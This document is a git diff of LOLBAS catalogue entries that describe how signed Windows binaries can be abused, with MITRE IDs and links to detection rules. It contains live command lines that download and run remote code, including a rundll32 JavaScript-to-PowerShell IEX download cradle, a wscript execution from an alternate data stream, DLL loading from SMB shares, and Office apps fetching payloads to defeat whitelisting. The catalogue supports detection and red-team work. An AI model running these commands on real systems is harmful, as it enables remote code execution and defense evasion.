- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
|
||||
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_regasm.yml
|
||||
- Elastic: https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/execution_register_server_program_connecting_to_the_internet.toml
|
||||
|
@ -11,6 +11,8 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Tags:
|
||||
- Execute: DLL
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\Register-cimprovider.exe
|
||||
- Path: C:\Windows\SysWOW64\Register-cimprovider.exe
|
||||
|
@ -11,6 +11,9 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1218.009
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Tags:
|
||||
- Execute: DLL
|
||||
- Input: Custom Format
|
||||
- Command: regsvcs.exe AllTheThingsx64.dll
|
||||
Description: Loads the target .DLL file and executes the RegisterClass function.
|
||||
Usecase: Execute dll file and bypass Application whitelisting
|
||||
@ -18,11 +21,12 @@ Commands:
|
||||
Privileges: Local Admin
|
||||
MitreID: T1218.009
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Tags:
|
||||
- Execute: DLL
|
||||
- Input: Custom Format
|
||||
Full_Path:
|
||||
- Path: c:\Windows\Microsoft.NET\Framework\v*\regsvcs.exe
|
||||
- Path: c:\Windows\Microsoft.NET\Framework64\v*\regsvcs.exe
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_regasm.yml
|
||||
- Elastic: https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/execution_register_server_program_connecting_to_the_internet.toml
|
||||
|
@ -11,6 +11,8 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1218.011
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Tags:
|
||||
- Execute: DLL
|
||||
- Command: rundll32.exe \\10.10.10.10\share\payload.dll,EntryPoint
|
||||
Description: Use Rundll32.exe to execute a DLL from a SMB share. EntryPoint is the name of the entry point in the .DLL file to execute.
|
||||
Usecase: Execute DLL from SMB share.
|
||||
@ -18,6 +20,8 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1218.011
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Tags:
|
||||
- Execute: DLL
|
||||
- Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');")
|
||||
Description: Use Rundll32.exe to execute a JavaScript script that runs a PowerShell script that is downloaded from a remote web site.
|
||||
Usecase: Execute code from Internet
|
||||
@ -53,6 +57,8 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1564.004
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Tags:
|
||||
- Execute: DLL
|
||||
- Command: rundll32.exe -sta {CLSID}
|
||||
Description: Use Rundll32.exe to load a registered or hijacked COM Server payload. Also works with ProgID.
|
||||
Usecase: Execute a DLL/EXE COM server payload or ScriptletURL code.
|
||||
@ -60,11 +66,11 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1218.011
|
||||
OperatingSystem: Windows 10 (and likely previous versions), Windows 11
|
||||
Tags:
|
||||
- Execute: DLL
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\rundll32.exe
|
||||
- Path: C:\Windows\SysWOW64\rundll32.exe
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/network_connection/net_connection_win_rundll32_net_connections.yml
|
||||
- Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml
|
||||
|
@ -11,6 +11,8 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1564.004
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
Tags:
|
||||
- Type: Compression
|
||||
- Command: tar -xf compressedfilename:ads
|
||||
Description: Decompress a compressed file from an alternate data stream (ADS).
|
||||
Usecase: Can be used to evade defensive countermeasures, or to hide as part of a persistence mechanism
|
||||
@ -18,6 +20,8 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1564.004
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
Tags:
|
||||
- Type: Compression
|
||||
- Command: tar -xf \\host1\archive.tar
|
||||
Description: Extracts archive.tar from the remote (internal) host (host1) to the current host.
|
||||
Usecase: Copy files
|
||||
@ -25,6 +29,8 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1105
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
Tags:
|
||||
- Type: Compression
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\tar.exe
|
||||
- Path: C:\Windows\SysWOW64\tar.exe
|
||||
|
@ -11,6 +11,8 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1127
|
||||
OperatingSystem: Windows 7, Windows 10, Windows 11
|
||||
Tags:
|
||||
- Execute: WSH
|
||||
- Command: vbc -reference:Microsoft.VisualBasic.dll c:\temp\vbs\run.vb
|
||||
Description: Binary file used by .NET to compile Visual Basic code to an executable.
|
||||
Usecase: Compile attacker code on system. Bypass defensive counter measures.
|
||||
@ -18,6 +20,8 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1127
|
||||
OperatingSystem: Windows 7, Windows 10, Windows 11
|
||||
Tags:
|
||||
- Execute: WSH
|
||||
Full_Path:
|
||||
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
|
||||
- Path: C:\Windows\Microsoft.NET\Framework64\v3.5\vbc.exe
|
||||
@ -28,6 +32,4 @@ Detection:
|
||||
- Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_dotnet_compiler_parent_process.toml
|
||||
Acknowledgement:
|
||||
- Person: Lior Adar
|
||||
Handle:
|
||||
- Person: Hai Vaknin(Lux)
|
||||
Handle:
|
||||
|
@ -39,11 +39,11 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Tags:
|
||||
- Execute: WSH
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\wbem\wmic.exe
|
||||
- Path: C:\Windows\SysWOW64\wbem\wmic.exe
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/image_load/image_load_wmic_remote_xsl_scripting_dlls.yml
|
||||
- Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_wmic_xsl_script_processing.yml
|
||||
|
@ -11,6 +11,8 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1564.004
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Tags:
|
||||
- Execute: WSH
|
||||
- Command: echo GetObject("script:https://raw.githubusercontent.com/sailay1996/misc-bin/master/calc.js") > %temp%\test.txt:hi.js && wscript.exe %temp%\test.txt:hi.js
|
||||
Description: Download and execute script stored in an alternate data stream
|
||||
Usecase: Execute hidden code to evade defensive counter measures
|
||||
@ -21,8 +23,6 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\wscript.exe
|
||||
- Path: C:\Windows\SysWOW64\wscript.exe
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_wscript_cscript_script_exec.yml
|
||||
- Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/file/file_event/file_event_win_net_cli_artefact.yml
|
||||
|
@ -5,16 +5,16 @@ Author: 'David Middlehurst'
|
||||
Created: 2020-09-23
|
||||
Commands:
|
||||
- Command: wuauclt.exe /UpdateDeploymentProvider Full_Path_To_DLL /RunHandlerComServer
|
||||
Description: Full_Path_To_DLL would be the abosolute path to .DLL file and would execute code on attach.
|
||||
Description: Full_Path_To_DLL would be the absolute path to .DLL file and would execute code on attach.
|
||||
Usecase: Execute dll via attach/detach methods
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
OperatingSystem: Windows 10
|
||||
Tags:
|
||||
- Execute: DLL
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\wuauclt.exe
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/network_connection/net_connection_win_wuauclt_network_connection.yml
|
||||
- Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_wuauclt.yml
|
||||
|
@ -19,12 +19,14 @@ Commands:
|
||||
MitreID: T1218
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
- Command: xwizard RunWizard {7940acf8-60ba-4213-a7c3-f3b400ee266d} /zhttps://pastebin.com/raw/iLxUT5gM
|
||||
Description: Xwizard.exe uses RemoteApp and Desktop Connections wizard to download a file, and save it to %LocalAppData%\Microsoft\Windows\INetCache\<8_RANDOM_ALNUM_CHARS>/<FILENAME>[1].<EXTENSION> or %LocalAppData%\Microsoft\Windows\INetCache\IE\<8_RANDOM_ALNUM_CHARS>/<FILENAME>[1].<EXTENSION>
|
||||
Description: Xwizard.exe uses RemoteApp and Desktop Connections wizard to download a file, and save it to INetCache.
|
||||
Usecase: Download file from Internet
|
||||
Category: Download
|
||||
Privileges: User
|
||||
MitreID: T1105
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
Tags:
|
||||
- Download: INetCache
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\xwizard.exe
|
||||
- Path: C:\Windows\SysWOW64\xwizard.exe
|
||||
|
@ -18,6 +18,8 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1218.011
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
Tags:
|
||||
- Input: INF
|
||||
- Command: rundll32.exe advpack.dll,RegisterOCX test.dll
|
||||
Description: Launch a DLL payload by calling the RegisterOCX function.
|
||||
Usecase: Load a DLL payload.
|
||||
@ -25,6 +27,8 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1218.011
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
Tags:
|
||||
- Execute: DLL
|
||||
- Command: rundll32.exe advpack.dll,RegisterOCX calc.exe
|
||||
Description: Launch an executable by calling the RegisterOCX function.
|
||||
Usecase: Run an executable payload.
|
||||
|
@ -25,6 +25,8 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1218.011
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
Tags:
|
||||
- Execute: DLL
|
||||
- Command: rundll32.exe ieadvpack.dll,RegisterOCX calc.exe
|
||||
Description: Launch an executable by calling the RegisterOCX function.
|
||||
Usecase: Run an executable payload.
|
||||
|
@ -11,6 +11,8 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1105
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
Tags:
|
||||
- Download: INetCache
|
||||
Full_Path:
|
||||
- Path: c:\windows\system32\scrobj.dll
|
||||
- Path: c:\windows\syswow64\scrobj.dll
|
||||
|
@ -11,6 +11,8 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1218.011
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
Tags:
|
||||
- Input: INF
|
||||
- Command: rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 C:\Tools\calc_exe.inf
|
||||
Description: Launch an executable file via the InstallHinfSection function and .inf file section directive.
|
||||
Usecase: Load an executable payload.
|
||||
@ -18,6 +20,8 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1218.011
|
||||
OperatingSystem: Windows
|
||||
Tags:
|
||||
- Input: INF
|
||||
Full_Path:
|
||||
- Path: c:\windows\system32\setupapi.dll
|
||||
- Path: c:\windows\syswow64\setupapi.dll
|
||||
|
@ -11,6 +11,8 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1218.011
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
Tags:
|
||||
- Execute: DLL
|
||||
- Command: rundll32.exe shell32.dll,ShellExec_RunDLL beacon.exe
|
||||
Description: Launch an executable by calling the ShellExec_RunDLL function.
|
||||
Usecase: Run an executable payload.
|
||||
|
@ -5,12 +5,14 @@ Author: Eral4m
|
||||
Created: 2021-01-06
|
||||
Commands:
|
||||
- Command: rundll32.exe c:\Windows\System32\shimgvw.dll,ImageView_Fullscreen http://x.x.x.x/payload.exe
|
||||
Description: Once executed, rundll32.exe will download the file at the URL in the command to %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE\<random>\payload[1].exe. Can also be used with entrypoint 'ImageView_FullscreenA'.
|
||||
Description: Once executed, rundll32.exe will download the file at the URL in the command to INetCache. Can also be used with entrypoint 'ImageView_FullscreenA'.
|
||||
Usecase: Download file from remote location.
|
||||
Category: Download
|
||||
Privileges: User
|
||||
MitreID: T1105
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
Tags:
|
||||
- Download: INetCache
|
||||
Full_Path:
|
||||
- Path: c:\windows\system32\shimgvw.dll
|
||||
- Path: c:\windows\syswow64\shimgvw.dll
|
||||
|
@ -11,6 +11,8 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1218.011
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
Tags:
|
||||
- Input: INF
|
||||
- Command: rundll32 syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 c:\temp\something.inf
|
||||
Description: Launch an executable file via the SetupInfObjectInstallAction function and .inf file section directive.
|
||||
Usecase: Load an executable payload.
|
||||
@ -18,6 +20,8 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1218.011
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
Tags:
|
||||
- Input: INF
|
||||
Full_Path:
|
||||
- Path: c:\windows\system32\syssetup.dll
|
||||
- Path: c:\windows\syswow64\syssetup.dll
|
||||
|
@ -21,8 +21,6 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: c:\windows\system32\zipfldr.dll
|
||||
- Path: c:\windows\syswow64\zipfldr.dll
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml
|
||||
Resources:
|
||||
|
@ -11,6 +11,8 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1216
|
||||
OperatingSystem: Windows 10 21H1 (likely other versions as well), Windows 11
|
||||
Tags:
|
||||
- Execute: DLL
|
||||
Full_Path:
|
||||
- Path: C:\Windows\diagnostics\system\Audio\CL_LoadAssembly.ps1
|
||||
Code_Sample:
|
||||
|
@ -11,6 +11,8 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1216
|
||||
OperatingSystem: Windows 10 21H1 (likely other versions as well), Windows 11
|
||||
Tags:
|
||||
- Execute: DLL
|
||||
Full_Path:
|
||||
- Path: C:\Windows\diagnostics\system\Networking\UtilityFunctions.ps1
|
||||
Code_Sample:
|
||||
|
@ -11,6 +11,8 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
OperatingSystem: Windows
|
||||
Tags:
|
||||
- Execute: DLL
|
||||
- Command: AccCheckConsole.exe -window "Untitled - Notepad" C:\path\to\your\lolbas.dll
|
||||
Description: Load a managed DLL in the context of AccCheckConsole.exe. The -window switch value can be set to an arbitrary active window name.
|
||||
Usecase: Local execution of managed code to bypass AppLocker.
|
||||
@ -18,6 +20,8 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
OperatingSystem: Windows
|
||||
Tags:
|
||||
- Execute: DLL
|
||||
Full_Path:
|
||||
- Path: C:\Program Files (x86)\Windows Kits\10\bin\10.0.22000.0\x86\AccChecker\AccCheckConsole.exe
|
||||
- Path: C:\Program Files (x86)\Windows Kits\10\bin\10.0.22000.0\x64\AccChecker\AccCheckConsole.exe
|
||||
|
@ -28,8 +28,6 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Program Files\Microsoft Office\root\client\appvlp.exe
|
||||
- Path: C:\Program Files (x86)\Microsoft Office\root\client\appvlp.exe
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_appvlp.yml
|
||||
Resources:
|
||||
|
@ -11,6 +11,8 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
OperatingSystem: Windows
|
||||
Tags:
|
||||
- Execute: WSH
|
||||
- Command: bginfo.exe bginfo.bgi /popup /nolicprompt
|
||||
Description: Execute VBscript code that is referenced within the bginfo.bgi file.
|
||||
Usecase: Local execution of VBScript
|
||||
@ -18,12 +20,16 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
OperatingSystem: Windows
|
||||
Tags:
|
||||
- Execute: WSH
|
||||
- Command: \\10.10.10.10\webdav\bginfo.exe bginfo.bgi /popup /nolicprompt
|
||||
Usecase: Remote execution of VBScript
|
||||
Description: Execute bginfo.exe from a WebDAV server.
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
Tags:
|
||||
- Execute: WSH
|
||||
OperatingSystem: Windows
|
||||
- Command: \\10.10.10.10\webdav\bginfo.exe bginfo.bgi /popup /nolicprompt
|
||||
Usecase: Remote execution of VBScript
|
||||
@ -32,6 +38,8 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
OperatingSystem: Windows
|
||||
Tags:
|
||||
- Execute: WSH
|
||||
- Command: \\live.sysinternals.com\Tools\bginfo.exe \\10.10.10.10\webdav\bginfo.bgi /popup /nolicprompt
|
||||
Usecase: Remote execution of VBScript
|
||||
Description: This style of execution may not longer work due to patch.
|
||||
@ -39,6 +47,8 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
OperatingSystem: Windows
|
||||
Tags:
|
||||
- Execute: WSH
|
||||
- Command: \\live.sysinternals.com\Tools\bginfo.exe \\10.10.10.10\webdav\bginfo.bgi /popup /nolicprompt
|
||||
Usecase: Remote execution of VBScript
|
||||
Description: This style of execution may not longer work due to patch.
|
||||
@ -46,10 +56,10 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
OperatingSystem: Windows
|
||||
Tags:
|
||||
- Execute: WSH
|
||||
Full_Path:
|
||||
- Path: No fixed path
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_bginfo.yml
|
||||
- Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml
|
||||
|
@ -11,6 +11,8 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1055
|
||||
OperatingSystem: Windows
|
||||
Tags:
|
||||
- Execute: DLL
|
||||
- Command: coregen.exe dummy_assembly_name
|
||||
Description: Loads the coreclr.dll in the corgen.exe directory (e.g. C:\Program Files\Microsoft Silverlight\5.1.50918.0).
|
||||
Usecase: Execute DLL code
|
||||
@ -25,6 +27,8 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
OperatingSystem: Windows
|
||||
Tags:
|
||||
- Execute: DLL
|
||||
Full_Path:
|
||||
- Path: C:\Program Files\Microsoft Silverlight\5.1.50918.0\coregen.exe
|
||||
- Path: C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\coregen.exe
|
||||
@ -42,8 +46,5 @@ Resources:
|
||||
- Link: https://www.fireeye.com/blog/threat-research/2019/10/staying-hidden-on-the-endpoint-evading-detection-with-shellcode.html
|
||||
Acknowledgement:
|
||||
- Person: Nicky Tyrer
|
||||
Handle:
|
||||
- Person: Evan Pena
|
||||
Handle:
|
||||
- Person: Casey Erikson
|
||||
Handle:
|
||||
|
@ -6,11 +6,13 @@ Created: 2019-07-19
|
||||
Commands:
|
||||
- Command: Excel.exe http://192.168.1.10/TeamsAddinLoader.dll
|
||||
Description: Downloads payload from remote server
|
||||
Usecase: It will download a remote payload and place it in the cache folder
|
||||
Usecase: It will download a remote payload and place it in INetCache.
|
||||
Category: Download
|
||||
Privileges: User
|
||||
MitreID: T1105
|
||||
OperatingSystem: Windows
|
||||
Tags:
|
||||
- Download: INetCache
|
||||
Full_Path:
|
||||
- Path: C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\Excel.exe
|
||||
- Path: C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\Excel.exe
|
||||
|
@ -6,11 +6,13 @@ Created: 2022-07-24
|
||||
Commands:
|
||||
- Command: MsoHtmEd.exe https://example.com/payload
|
||||
Description: Downloads payload from remote server
|
||||
Usecase: It will download a remote payload and place it in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE)
|
||||
Usecase: It will download a remote payload and place it in INetCache.
|
||||
Category: Download
|
||||
Privileges: User
|
||||
MitreID: T1105
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
Tags:
|
||||
- Download: INetCache
|
||||
Full_Path:
|
||||
- Path: C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\MSOHTMED.exe
|
||||
- Path: C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\MSOHTMED.exe
|
||||
|
@ -6,11 +6,13 @@ Created: 2022-08-02
|
||||
Commands:
|
||||
- Command: mspub.exe https://example.com/payload
|
||||
Description: Downloads payload from remote server
|
||||
Usecase: It will download a remote payload and place it in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE)
|
||||
Usecase: It will download a remote payload and place it in INetCache.
|
||||
Category: Download
|
||||
Privileges: User
|
||||
MitreID: T1105
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
Tags:
|
||||
- Download: INetCache
|
||||
Full_Path:
|
||||
- Path: C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\MSPUB.exe
|
||||
- Path: C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\MSPUB.exe
|
||||
|
@ -6,11 +6,13 @@ Created: 2019-07-19
|
||||
Commands:
|
||||
- Command: Powerpnt.exe "http://192.168.1.10/TeamsAddinLoader.dll"
|
||||
Description: Downloads payload from remote server
|
||||
Usecase: It will download a remote payload and place it in the cache folder
|
||||
Usecase: It will download a remote payload and place it in INetCache.
|
||||
Category: Download
|
||||
Privileges: User
|
||||
MitreID: T1105
|
||||
OperatingSystem: Windows
|
||||
Tags:
|
||||
- Download: INetCache
|
||||
Full_Path:
|
||||
- Path: C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\Powerpnt.exe
|
||||
- Path: C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\Powerpnt.exe
|
||||
|
@ -12,14 +12,18 @@ Commands:
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1202
|
||||
OperatingSystem: Windows 8.1 and higher, Windows Server 2012 and higher.
|
||||
OperatingSystem: Windows 8.1 and higher, Windows Server 2012 and higher
|
||||
Tags:
|
||||
- Execute: DLL
|
||||
- Command: procdump.exe -md calc.dll foobar
|
||||
Description: Loads calc.dll where configured with DLL_PROCESS_ATTACH execution, process argument can be arbitrary.
|
||||
Usecase: Performs execution of unsigned DLL.
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1202
|
||||
OperatingSystem: Windows 8.1 and higher, Windows Server 2012 and higher.
|
||||
OperatingSystem: Windows 8.1 and higher, Windows Server 2012 and higher
|
||||
Tags:
|
||||
- Execute: DLL
|
||||
Full_Path:
|
||||
- Path: no default
|
||||
Detection:
|
||||
|
@ -18,6 +18,9 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1127
|
||||
OperatingSystem: Windows
|
||||
Tags:
|
||||
- Execute: DLL
|
||||
- Input: Custom Format
|
||||
Full_Path:
|
||||
- Path: no default
|
||||
Detection:
|
||||
|
@ -11,6 +11,8 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1127
|
||||
OperatingSystem: Windows
|
||||
Tags:
|
||||
- Execute: DLL
|
||||
- Command: Tracker.exe /d .\calc.dll /c C:\Windows\write.exe
|
||||
Description: Use tracker.exe to proxy execution of an arbitrary DLL into another process. Since tracker.exe is also signed it can be used to bypass application whitelisting solutions.
|
||||
Usecase: Injection of locally stored DLL file into target process.
|
||||
@ -18,6 +20,8 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1127
|
||||
OperatingSystem: Windows
|
||||
Tags:
|
||||
- Execute: DLL
|
||||
Full_Path:
|
||||
- Path: no default
|
||||
Code_Sample:
|
||||
|
@ -6,11 +6,13 @@ Created: 2019-07-19
|
||||
Commands:
|
||||
- Command: winword.exe "http://192.168.1.10/TeamsAddinLoader.dll"
|
||||
Description: Downloads payload from remote server
|
||||
Usecase: It will download a remote payload and place it in the cache folder
|
||||
Usecase: It will download a remote payload and place it in INetCache.
|
||||
Category: Download
|
||||
Privileges: User
|
||||
MitreID: T1105
|
||||
OperatingSystem: Windows
|
||||
Tags:
|
||||
- Download: INetCache
|
||||
Full_Path:
|
||||
- Path: C:\Program Files\Microsoft Office\root\Office16\winword.exe
|
||||
- Path: C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\winword.exe
|
||||
@ -28,8 +30,6 @@ Full_Path:
|
||||
- Path: C:\Program Files (x86)\Microsoft Office\Office12\winword.exe
|
||||
- Path: C:\Program Files\Microsoft Office\Office12\winword.exe
|
||||
- Path: C:\Program Files\Microsoft Office\Office12\winword.exe
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_office_arbitrary_cli_download.yml
|
||||
- IOC: Suspicious Office application Internet/network traffic
|
||||
|
@ -11,6 +11,8 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
OperatingSystem: Windows 10 21H2 (likely previous and newer versions with modern versions of Visual Studio installed)
|
||||
Tags:
|
||||
- Execute: DLL
|
||||
Full_Path:
|
||||
- Path: c:\Program Files (x86)\Microsoft Visual Studio\2019\Professional\Common7\IDE\Extensions\Microsoft\LiveShare\Agent\vsls-agent.exe
|
||||
Detection:
|
||||
|
@ -11,6 +11,8 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1127
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
Tags:
|
||||
- Execute: DLL
|
||||
Full_Path:
|
||||
- Path: C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\CommonExtensions\Microsoft\TestWindow\vstest.console.exe
|
||||
- Path: C:\Program Files (x86)\Microsoft Visual Studio\2022\TestAgent\Common7\IDE\CommonExtensions\Microsoft\TestWindow\vstest.console.exe
|
||||
|
Loading…
Reference in New Issue
Block a user